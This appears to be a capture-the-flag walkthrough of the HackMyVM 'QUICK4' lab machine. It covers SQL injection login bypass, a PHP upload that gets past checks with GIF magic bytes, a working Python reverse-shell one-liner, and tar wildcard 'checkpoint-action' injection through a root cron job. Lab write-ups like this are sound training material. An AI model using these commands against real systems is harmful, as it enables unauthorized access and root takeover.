Let’s try another machine from hackmyvm QUICK4.
Enumerate open ports with nmap. It has only couple of ports open 80 and 22.
Let’s fuzz web application for files and directories. FIrst I fuzz for files but did not get anything, then I performed directory fuzzing and found some results. I also used dirb for the same, it also gave detailed results but almost same.
Let’s visit the web page in browser and we see same page as we saw in earlier quick machines.
When I clicked on ‘Make Appointment’, it asked me to register a user which I did.
After login I check if it is vulnerable to IDOR which was the case in previous, but obviously it is not. I also checked for SOLi in id parameter, it is not vulnerable.
After clicking on contacts, it gave me a list of all employees.
This might be useful somewhere.Let’s visit the /employee directory in web browser. It is asking for credentials.
We have usernames, but don’t have the password. We can try SQL Injection in login with any of the available users.
SQL injection successful. We are able to login with the user ‘andrew.speed@quick.hmv’
I tried SQLmap to get the shell, but unable to do that. Sqlmap able to list the databases.
When I checked further, I saw we have ability to upload the photo.
Let’s try to upload a malicious php file and see what application says.
I tried to upload a php script, which fails. Let’s try to bypass it with magic bytes. I just added magic bytes for GIF which is GIF87a and able to upload the malicious file.
After that I tried to login with SQL injection to login with user “nick.greenhorn@quick.hmv”, but get the profile of quick user which might be the first user in the database.
I changed password for the user using the same method used to upload the photo.
After login with nick user, I inspect the elements specially the profile name, I saw that there is the path for uploaded file.
I browse the path in another tab and it gives me the below page.
Let’s try to run the command using php shell.
Lets try to get the reverse shell using python reverse shell. Used below shell
python -c ‘import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.0.0.1”,4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(“/bin/sh”)’
I use Linpeas to find the way to escalate the privilege, the Cron Job section of output shows below job.
Let’s open the backup script. It uses tar command with wildcard which is not good practice
I used the method describe in this article, it is really great write-up. As mentioned in artcile I created a file the switch –index-file=output.txt. And after few seconds saw the output.txt file with root permission.
In article, it is mentioned to create an user with root permission, instead will add a reverse shell which connect us back on attacker machine.
Executed commands:
touch ‘ — checkpoint-action=exec=bash myshell.sh’
touch ‘/var/www/html/ — checkpoint-action=exec=bash myshell.sh’
On my Kali machine started the netcat listener and after few seconds got the shell.
So this is the box, hope you like it. See you soon!!
